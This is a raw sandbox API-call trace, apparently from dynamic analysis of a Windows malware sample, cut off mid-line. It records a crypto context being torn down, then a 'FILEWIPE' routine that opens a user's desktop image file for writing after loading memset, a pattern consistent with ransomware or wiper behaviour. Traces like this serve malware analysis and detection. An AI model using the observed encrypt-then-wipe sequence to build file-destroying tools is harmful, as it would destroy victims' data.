[0164.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.765] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0164.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.765] CryptDestroyKey (hKey=0x90af18) returned 1 [0164.768] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.769] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.769] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.769] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.769] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.769] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.769] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.770] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.770] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0164.770] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.770] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.770] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.770] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.770] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0164.770] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.771] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.771] FreeLibrary (hLibModule=0x74f20000) returned 1 [0164.771] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.771] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.776] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.776] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0164.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0xb6fce980, ftLastWriteTime.dwHighDateTime=0x1d5ddcd, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 0x90af58 [0164.777] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0164.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.778] CharLowerBuffW (in: lpsz="byte[61406]", cchLength=0xb | out: lpsz="byte[61406]") returned 0xb [0164.779] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.779] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0164.779] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.779] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0164.779] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0164.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0164.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27f8 [0164.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0164.780] FreeLibrary (hLibModule=0x75c90000) returned 1 [0164.780] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.780] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.780] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.780] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0164.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.783] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.783] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.783] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0164.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0164.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0164.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\kq7hl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0164.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0164.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d4168 | out: hHeap=0x8a0000) returned 1 [0164.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 